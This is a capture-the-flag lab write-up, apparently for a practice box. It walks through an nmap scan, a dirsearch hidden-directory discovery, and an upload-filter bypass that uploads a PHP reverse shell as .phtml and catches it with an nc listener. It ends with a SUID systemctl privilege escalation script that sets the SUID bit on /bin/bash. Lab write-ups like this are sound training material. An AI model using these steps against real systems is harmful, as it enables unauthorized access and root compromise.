With the nmap scan I see several ports open but 3333 sticks out the most for 2 reasons.
1 http normally runs on port 80 not 3333.
2 The name of the http title is vuln university which is the name of this box
So now I simply typed the IP address with the http port and discovered a website. 10.10.120.237:3333
From here I was able to use dirsearch to discover hidden directories
I discovered a hidden directory for /internal/
Which appears to be an upload page
From here I was able to download a PHP reverse shell and save it in a text editor
Went inside the file and modified the ip address to the vpn connection or tun0/tap0
My VPN Ip address is 10.6.34.136
You can leave the port the same
I attempted to upload the file but the php extension is blocked
Phtml extension is allowed on this server so I changed the extension name on the file
The file was successfully uploaded
From here I did another dirsearch and found an upload page. Once we submit the reverse shell to the file upload page on /internal/ we naviagte to /internal/uploads to get a shell ( activate the reverse shell)
here is the dirsearch finding of the reverse shell activation
I now have a shell on the machine. Once you create a listener for the port using nc -lnvp 1234
You can execute the payload by going to the following site 10.10.120.237:3333/internal/uploads/php-reverse-shell.phtml
Here I found the user flag
From here I hosted the linpeas.sh file on a server so I could download linpeas on the machine
Here we discover a SUID vulnerability
I slightly modified the script that was provided.
TF=$(mktemp).service
echo ‘[Service]
Type=oneshot
ExecStart=/bin/sh -c “chmod +s /bin/bash”
[Install]
WantedBy=multi-user.target’ > $TF
/bin/systemctl link $TF
/bin/systemctl enable — now $TF
From here I was able to copy and paste the whole script for the systemcl suid and gain root
